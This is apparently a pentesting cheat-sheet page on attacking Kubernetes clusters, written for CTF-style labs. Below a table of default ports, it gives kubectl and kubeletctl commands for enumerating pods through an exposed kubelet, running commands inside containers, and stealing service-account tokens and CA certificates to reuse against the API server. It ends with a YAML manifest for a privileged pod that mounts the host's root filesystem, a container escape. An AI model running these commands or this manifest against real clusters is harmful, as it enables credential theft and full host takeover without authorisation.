TryhackmeHackthebox

Kubernetes

00. Basic

  • Default ports

Port Range
Purpose
Used By

6443

Kubernetes API server

All

2379-2380

etcd server client API

kube-apiserver, etcd

10250

Kubelet API

Self, Control plane

10259

kube-scheduler

Self

10257

kube-controller-manager

Self

10250

Kubelet API

Self, Control plane

30000-32767

NodePort Services

All

  • kubectl

## ------------------| Basic Infomations
kubectl --server <IP> get pod
kubectl --server <IP> cluster-info
kubectl --server <IP> get namespaces
kubectl --server <IP> auth can-i --list
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod
## ------------------| list all the pods on the node
kubeletctl pods -s <IP>

## ------------------| list all the running pods
kubeletctl runningpods -s <IP>
kubeletctl runningpods -s <IP> | jq -c '.items[].metadata | [.name, .namespace]'
## Check what's not in the kube-system namespace

## ------------------| Execute commands
kubeletctl -s <IP> exec "id" -p <PodName> -c <ContainerName>

## ------------------| Auth to Kubernetes API
# /run/secrets/kubernetes.io/serviceaccount
# /var/run/secrets/kubernetes.io/serviceaccount
# /secrets/kubernetes.io/serviceaccout
kubeletctl -s <IP> exec "ls /run/secrets/kubernetes.io/serviceaccount" -p <PodName> -c <ContainerName>                                           
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/ca.crt" -p <PodName> -c <ContainerName> | tee ca.crt
kubeletctl -s <IP> exec "cat /run/secrets/kubernetes.io/serviceaccount/token" -p <PodName> -c <ContainerName> | tee token
kubectl --server <IP> --certificate-authority=ca.crt --token=$(cat token) get pod

  • Create root pod

## ------------------| YAML skeleton
apiVersion: v1 
kind: Pod
metadata:
  name: h4rithd
  namespace: default
spec:
  containers:
  - name: h4rithd
    image: nginx:1.14.2 # Use this to get the version: kubectl get pod nginx -o yaml --server <IP>           
    volumeMounts: 
    - mountPath: /mnt
      name: hostfs
  volumes:
  - name: hostfs
    hostPath:  
      path: /
  automountServiceAccountToken: true
  hostNetwork: true
  
## ------------------| Start the pod
kubectl apply -f skeleton.yaml --server <IP>

kubeletctl exec "ls /mnt/" -s <IP> -p h4rithd -c h4rithd
PreviousAzure ADNextTools

Last updated